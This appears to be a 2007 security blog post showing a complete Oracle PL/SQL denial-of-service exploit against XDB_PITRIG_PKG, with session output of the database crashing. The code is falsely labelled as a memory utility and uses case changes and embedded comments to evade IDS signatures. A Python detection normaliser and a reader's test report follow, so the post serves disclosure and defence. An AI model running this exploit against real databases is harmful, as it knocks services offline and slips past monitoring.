SQL> grant create session to x identified by x;
Grant succeeded.
SQL> connect x/x
Connected.
SQL> edit
Wrote file afiedt.buf
  1  -- Utility to free Oracle memory
  2  declare
  3  larry varchar2(32767);
  4  mary varchar2(32767);
  5  begin
  6  larry:='larryellison';
  7  larry:=larry||larry;
  8  larry:=larry||larry;
  9  larry:=larry||larry;
 10  larry:=larry||larry;
 11  larry:=larry||larry;
 12  larry:=larry||larry;
 13  larry:=larry||larry;
 14  mary:='maryann';
 15  mary:=mary||mary;
 16  mary:=mary||mary;
 17  mary:=mary||mary;
 18  mary:=mary||mary;
 19  mary:=mary||mary;
 20  mary:=mary||mary;
 21  mary:=mary||mary;
 22  mary:=mary||mary;
 23  xDb
 24  /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
 25  , larry);
 26* end;
SQL> /
declare
*
ERROR at line 2:
ORA-03135: connection lost contact
SQL> connect system/manager
ERROR:
ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
SQL> connect system/manager
Connected.
SQL>
As you can see, running this Oracle exploit code causes the connection to the database to be lost. This has in fact crashed the database. I had to restart the database:
The interesting thing about this exploit is that it uses some IDS evasion techniques. It uses case changes and embedded comments to throw off IDS and IPS software that relies on simple rules to detect this type of attack.
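A detection rule can survive the case changes and embedded comments described above if the statement text is normalised before matching. The following is an added example, not code from the original post; the function names and the constructed sample statements are assumptions, and the parser is simplified (it does not handle q'[...]' literals or quoted identifiers).

```python
import re

# Exact, case-sensitive signature of the kind the post says is evaded.
NAIVE_SIGNATURE = "XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA"
NORMALIZED_RULE = re.compile(r"\bXDB\.XDB_PITRIG_PKG\.PITRIG_DROPMETADATA\b")

# String literals are matched first so comment markers inside quotes survive.
_TOKEN = re.compile(r"'(?:[^']|'')*'|/\*.*?\*/|--[^\n]*", re.DOTALL)


def normalize(sql):
    """Replace comments with a space, join dotted names, fold to upper case."""
    def keep_literals(match):
        token = match.group(0)
        return token if token.startswith("'") else " "
    without_comments = _TOKEN.sub(keep_literals, sql)
    return re.sub(r"\s*\.\s*", ".", without_comments).upper()


def naive_match(sql):
    return NAIVE_SIGNATURE in sql


def normalized_match(sql):
    return NORMALIZED_RULE.search(normalize(sql)) is not None


# The call as it appears in the session above, plus constructed statements.
SAMPLES = {
    "page_call": "xDb\n/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/"
                 "PITRIG_DROPMETADATA(mary\n, larry);",
    "plain_call": "XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(a, b);",       # constructed
    "comment_only": "-- XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA\nnull;",  # constructed
    "benign": "select '/* not a comment */' from dual",                  # constructed
}


def compare(samples=SAMPLES):
    """Return {name: (naive_hit, normalized_hit)} for each statement."""
    return {k: (naive_match(v), normalized_match(v)) for k, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:13} naive={naive!s:5} normalized={norm}")
```

The naive rule misses the call from the session and fires on a statement that only mentions the name in a comment; the normalised rule gets both right.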
November 8th, 2007 at 08:13 pm
Pete Finnigan says:
Tried this on 10.2.0.2 on Tru64 both with and without CPUOct2007. Both versions had the following error, but neither database crashed.
exception system: exiting due to multiple internal errors:
exception dispatch or unwind stuck in infinite loop
exception dispatch or unwind stuck in infinite loop
declare
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel